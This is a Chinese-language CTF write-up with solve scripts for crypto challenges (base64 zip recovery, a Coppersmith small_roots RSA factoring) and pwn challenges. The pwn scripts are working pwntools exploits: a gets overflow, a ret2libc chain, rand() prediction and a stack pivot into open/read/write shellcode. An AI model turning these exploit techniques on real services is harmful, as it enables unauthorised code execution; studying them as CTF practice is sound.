目录
Crypto
Absolute_Baby_Encrytpion
单表替换,略
babylua
四位大小写爆破,略
Magic of Encoding
这不是misc题吗???
base64解密看见一大堆fake flag;
看见PK压缩包格式了,多半要想一想怎么弄成压缩包。
我直接把fake的base64密文全删了,然后就给了一个压缩包出来了
# -*- coding: utf-8 -*-
# @Time : 2023/4/16 12:17
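# Strip the known fake-flag base64 fragments from the challenge text so the
# embedded PK (zip) data is left over, then write the recovered archive to disk.
import base64

# Fragments removed sequentially, in this order.
FAKE_FRAGMENTS = (
    b'ZmxhZ3tYZF9mYWtlX2ZsYWdfeER9',
    b'ZmluZF9tZV9pZl95b3VfY2Fu',
    b'ZmxhZ3tub3RfdGhlX2NvcnJlY3Rf',
    b'ZmxhZ19sb2x9',
    b'CmZsYWd7bm90X3RoZV9jb3JyZWN0X2ZsYWdfbG9sfQpmbGFne25vdF90aGVfY29ycmVjdF9mbGFnX2xvbH0K',
)

# Context managers close both handles even if a later step raises; the
# original left the input handle open.
with open('Magic_Of_Encoding.txt', 'rb') as src:
    f = src.read()

cleaned = f
for fragment in FAKE_FRAGMENTS:
    cleaned = cleaned.replace(fragment, b'')
print(cleaned)

# Base64 of the archive, pasted verbatim from the cleaned output above.  It is a
# hard-coded snapshot and is NOT derived from `cleaned` at run time, so the
# written zip does not change if the input file changes.
res = b'UEsDBBQACAAIAAZUilYAAAAAAAAAACUAAAAVACAATWFnaWMgb2YgRW5jb2RpbmcudHh0VVQNAAdNkTNkTpEzZE2RM2R1eAsAAQT1AQAABBQAAABLy0lMr84wKDCOrzQojc/JzDZOiS/JSI33NUnPTI43L8pMzq7lAgBQSwcIjmX6WicAAAAlAAAAUEsBAhQDFAAIAAgABlSKVo5l+lonAAAAJQAAABUAIAAAAAAAAAAAAKSBAAAAAE1hZ2ljIG9mIEVuY29kaW5nLnR4dFVUDQAHTZEzZE6RM2RNkTNkdXgLAAEE9QEAAAQUAAAAUEsFBgAAAAABAAEAYwAAAIoAAAAAAA=='
with open('1.zip', 'wb') as ff:
    ff.write(base64.b64decode(res))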
然后打开1.zip压缩包得到flag
Math Problem
给出域为p的椭圆曲线和其上一点的纵坐标。x是一个64 bits的小整数。考虑在模n的多项式环上求解x
使用(small_roots)方法
平时这种都是求解比较大的数,我太久没做,没注意到epsilon这个参数了
SageMath中small_roots方法的epsilon参数默认值为0.05,该默认参数下的bound不足以解出本题的小整数解(根据 X ≤ 1/2 * N^(beta^2/delta - epsilon)),我们可以直接把epsilon的值调整为0.01
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间
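# Recover the RSA factors of n.  The unknown x satisfies the curve equation
# x^3 + a*x + b - y^2 = 0 modulo p (the curve is over F_p, see the note above),
# so a root of that polynomial over Z/nZ yields p = gcd(f(root), n).
# Only the low 52 bits are left to Coppersmith's small_roots; the high bits
# (i) are brute-forced, as described above.
from tqdm import tqdm

e = 65537
n = 79239019133008902130006198964639844798771408211660544649405418249108104979283858140199725213927656792578582828912684320882248828512464244641351915288069266378046829511827542801945752252863425605946379775869602719406340271702260307900825314967696531175183205977973427572862807386846990514994510850414958255877
c = 45457869965165575324534408050513326739799864850578881475341543330291990558135968254698676312246850389922318827771380881195754151389802803398367341521544667542828862543407738361578535730524976113729406101764290984943061582342991118766322793847422471903811686775249409300301726906738475446634950949059180072008
a = 9303981927028382051386918702900550228062240363697933771286553052631411452412621158116514735706670764224584958899184294505751247393129887316131576567242619
b = 9007779281398842447745292673398186664639261529076471011805234554666556577498532370235883716552696783469143334088312327338274844469338982242193952226631913
y = 970090448249525757357772770885678889252473675418473052487452323704761315577270362842929142427322075233537587085124672615901229826477368779145818623466854

PR.<x> = PolynomialRing(Zmod(n))

# i << 52 is the brute-forced high part.  The range start is kept from the
# original run (presumably resumed after an earlier partial search).
root = None
for i in tqdm(range(2148, 4096)):
    shift = i << 52
    f = ((x + shift)^3 + a * (x + shift) + b - y^2).monic()
    roots = f.small_roots(X=2^52, beta=0.44)
    if roots:
        print(i)
        print(roots)
        # Use the root that was actually found instead of a pasted constant.
        root = roots[0]
        break

if root is None:
    raise SystemExit('no small root found in the searched range')

# f still holds the polynomial for the i that succeeded.
p = gcd(ZZ(f(root)), n)
q = n // p
# inverse_mod is a Sage builtin; the original called inverse(), which is not
# defined unless imported from elsewhere.
d = inverse_mod(e, (p - 1) * (q - 1))
m = int(ZZ(pow(c, d, n)))
# Big-endian bytes, the same encoding long_to_bytes() would produce; print
# explicitly so the result also shows up when run as a script.
print(m.to_bytes(max(1, (m.bit_length() + 7) // 8), 'big'))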
打新生赛成小丑了
Pwn
EASY PWN
开启PIE
fd = open("/dev/urandom", 0);
if ( fd < 0 )
{
puts("Can't access /dev/urandom.");
exit(1);
}
v3 = read(fd, buf, 0xAuLL);
if ( v3 < 0 )
{
puts("Data not received from /dev/urandom");
exit(1);
}
close(fd);
puts("Password:");
gets(s1);
result = strcmp(s1, buf);
if ( result )
result = puts("I swore that was the right password ...");
else
v5 = 1;
if ( v5 )
{
puts("Guess I couldn't gaslight you!");
result = print_flag();
}
return result;
}
gets溢出到返回地址,然后覆盖后2字节为print_flag函数地址
exp
from pwn import *
# NOTE(review): the local process() is started and then immediately shadowed by
# remote(), so it is never closed or used; keep only the target actually in use.
p=process('./easypwn')
p=remote('node6.anna.nssctf.cn',28850)
elf=ELF('./easypwn')
# NOTE(review): both symbols are unused below (this script has no leak stage).
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
p.recvuntil(b':\n')
# 0x1f bytes of filler, 8 zero bytes, then only the low two bytes of the
# return address (the binary is PIE, see the note above).
payload=b'a'*0x1f+p64(0)+p16(0x11d5)
p.send(payload)
p.interactive()
Shellcode
没啥说的,短点的shellcode就行
我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的
from pwn import *
from LibcSearcher import *
p=process('./p1')
#p=remote('node5.anna.nssctf.cn',28961)
context.arch='amd64'
#context.log_level='debug'
# Fixed gadget addresses (so the binary is presumably not PIE).
# NOTE(review): `lea` is never used below.
lea=0x000000000040074e
rdi=0x00000000004007b3
ret=0x000000000040028e
elf=ELF('./p1')
def get_addr():
    """Return the 64-bit value ending in the next 0x7f byte received on `p`.

    Reads up to and including the next 0x7f byte, keeps the last six bytes of
    what was received, zero-pads them to eight and unpacks them with u64.
    """
    received = p.recvuntil(b'\x7f')
    tail = received[-6:].ljust(8, b'\x00')
    return u64(tail)
# NOTE(review): context.arch was already set above; this call repeats it and
# additionally enables debug logging (the commented-out line above does the same).
context(log_level = 'debug', arch = 'amd64', os = 'linux')
p.recv()
p.send(b'1')
p.recvuntil(b"Let's start!\n")
# Round 1: leak puts@got through puts@plt, then return to main for a second round.
p.sendline(b'a'*10+p64(0)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main']))
puts_addr=get_addr()
# NOTE(review): the libc identified from a single leaked offset is trusted
# without any cross-check; a wrong match only shows up when round 2 fails.
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
log.success(hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
log.success(hex(system))
log.success(hex(bin_sh))
#gdb.attach(p)
p.recv()
p.send(b'a')
p.recvuntil(b"Let's start!\n")
# Round 2: extra ret gadget (presumably for stack alignment), then system("/bin/sh").
p.sendline(b'a'*10+p64(0)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system))
p.interactive()
真男人下120层
这题用ctypes库加载libc文件,这样得到的随机数序列就和程序一模一样了;没见过的话可以看一看,感觉很好用
from pwn import *
from ctypes import *
# NOTE(review): process() is shadowed immediately by remote(); the local child
# is left running and is never used.
p=process('./bin')
p=remote('node6.anna.nssctf.cn',28283)
# Load the host libc so the very same srand()/rand() implementation is used;
# a time(0) seed only matches when local and remote clocks agree to the second.
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# NOTE(review): ctypes assumes a C int return type by default, while time_t is
# 64-bit; this works only while the epoch fits in 32 bits (until 2038) — set
# libc.time.restype explicitly if this is reused.
libc.srand(libc.time(0))
# Presumably mirrors the target's own seed derivation (constant taken from the
# challenge binary) — cannot be verified from this page.
v4=libc.rand()% 3 - 1522127470
libc.srand(v4)
# One answer per floor, 120 floors; indentation restored (lost in the paste).
for i in range(120):
    t=libc.rand() %4+1
    p.sendline(str(t).encode())
p.interactive()
Random
远程没通
随机数预测+栈迁移到shellcode
感觉跟 [极客大挑战 2019]Not Bad 一样。
from pwn import *
from ctypes import *
context.arch='amd64'
context.log_level='debug'
elf = ELF('./p4')
#p = remote('node3.buuoj.cn',28461)
p=process('./p4')
# Gadget address; the second version below names the same address jmp_rsp.
jmp = 0x000000000040094e
bss = 0x601200
# open/read/write shellcode, assembled later: reads from fd 3 (what open() is
# expected to return) into bss and writes that buffer to stdout.
orw_payload = shellcraft.open("/flag")
orw_payload += shellcraft.read(3, bss, 0x50)
orw_payload += shellcraft.write(1, bss,0x50)
# Host libc used to reproduce the target's time-seeded rand() sequence; only
# works while local and remote clocks agree to the second.
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
def RANDOM():
    """Answer one prompt on `p` with the next libc rand() value reduced mod 50.

    Waits for the ':' prompt, sends the guess, then consumes up to 'door'.
    """
    p.recvuntil(b':\n')
    guess = libc.rand() % 50
    p.sendline(str(guess).encode())
    p.recvuntil(b'door\n')
RANDOM()
# Stage 1: a read(0, bss, 0x100) stub plus a call into bss, padded to 0x28
# bytes, then the jmp gadget followed by a pivot back into the buffer.
payload=asm(shellcraft.read(0,bss,0x100))+asm('mov rax,0x601200;call rax')
payload=payload.ljust(0x28,b'\x00')
payload+=p64(jmp)+asm('sub rsp,0x30;jmp rsp')
# NOTE(review): `payload` is built but never sent — only the shellcode is.
# The second version below sends the stage-1 payload first; that may be why
# this one did not work remotely.
shellcode=asm(orw_payload)
p.sendline(shellcode)
p.interactive()
看见别人直接用rsp替代bss,都不用再call一下就行。又学到一点
from pwn import *
from ctypes import *
context.arch='amd64'
context.log_level='debug'
elf = ELF('./p4')
#p = remote('node3.buuoj.cn',28461)
p=process('./p4')
# NOTE(review): bss is assigned but unused in this version; the shellcode
# below addresses its buffer relative to rsp instead.
bss=0x600100
# open/read/write shellcode: fd 3 is what open() is expected to return; the
# buffer lives at rsp, so no fixed data address is needed.
orw_payload = shellcraft.open("/flag")
orw_payload += shellcraft.read(3, 'rsp', 0x50)
orw_payload += shellcraft.write(1, 'rsp',0x50)
# Host libc used to reproduce the target's time-seeded rand() sequence; only
# works while local and remote clocks agree to the second.
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
def RANDOM():
    """Reply to one ':' prompt on `p` with libc.rand() % 50, then skip past 'door'."""
    p.recvuntil(b':\n')
    answer = str(libc.rand() % 50)
    p.sendline(answer.encode())
    p.recvuntil(b'door\n')
RANDOM()
jmp_rsp=0x000000000040094e
# Stage 1: a read(0, rsp, 0x50) stub padded to 0x28 bytes, then the jmp rsp
# gadget and a pivot back down into the buffer that was just read.
payload=asm(shellcraft.read(0,'rsp',0x50))
payload=payload.ljust(0x28,b'\x00')
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')
p.send(payload)
# Stage 2: 0xc bytes of filler before the shellcode (presumably to line up with
# the adjusted rsp — not verified here).
shellcode=asm(orw_payload)
p.sendline(b'a'*0xc+shellcode)
p.interactive()